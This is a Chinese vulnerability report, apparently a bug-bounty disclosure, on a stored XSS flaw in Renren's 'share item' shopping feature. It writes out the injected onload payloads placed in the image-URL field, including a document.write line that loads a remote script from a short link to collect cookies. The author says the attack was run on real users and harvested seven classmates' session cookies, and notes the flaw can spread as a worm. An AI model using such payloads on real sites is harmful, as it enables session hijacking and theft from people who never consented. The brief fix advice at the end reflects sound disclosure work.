人人网XSS造成强力蠕虫，这回不跨GG了，只要加我好友，一开人人就中招。这要是传播起来- -杠杠的。
首先上图吧，最严重的两个
 
 
 
这是在人人网个人首页中，
还有一个是在人人逛街的首页中- -如果我的推荐出现在了主页中，在这个时候进入人人逛街主页的人全都会被蠕虫攻击。
还有两处
在个人主页以及个人专辑中、在推荐详情中：
 
 
 
看到这里估计已经知道出事地点是哪了。就是人人逛街的“分享宝贝”。
下面是实现过程：
首先“分享宝贝”到淘宝上随便选一个宝贝分享过来
 
 
 
通过验证后
 
 
 
在点发布前对包进行拦截，可以看到这样一个包
 
 
 
其中的pics中有四张图片：
http%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Flarge_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dlarge%26w%3D450%26h%3D450%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain1_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dmain1%26w%3D320%26h%3D320%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain2_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dmain2%26w%3D210%26h%3D210%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fhead_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dhead%26w%3D100%26h%3D100
在每张图片末尾都加上" onload="alert(1898)"
然后就不论是在小图 中图 大图中，，都能被跨到了- -
为了进一步测试威力我将代码换成了：www.2cto.com
 
" onload="document.write('<script/src=http://t.cn/zW1EqRD></script>')"
然后等了40分钟
一共有我7位可爱的同学将他们的COOKIE传给了我= =
 

 
(duapp因为设置了啥映射，所以只能获取到本地IP = =)
可见在人人主页跨起来还是很给力的- -。。。
我一分享新东西就帮我在主页发出去了- -
我觉得我就不用吧蠕虫代码贴出来了- -，到这里危害已经很明显了- -
求给力啊。



修复方案：

问题很多，不止我提交的这一个，不过大部分都差不多，过滤干净就行。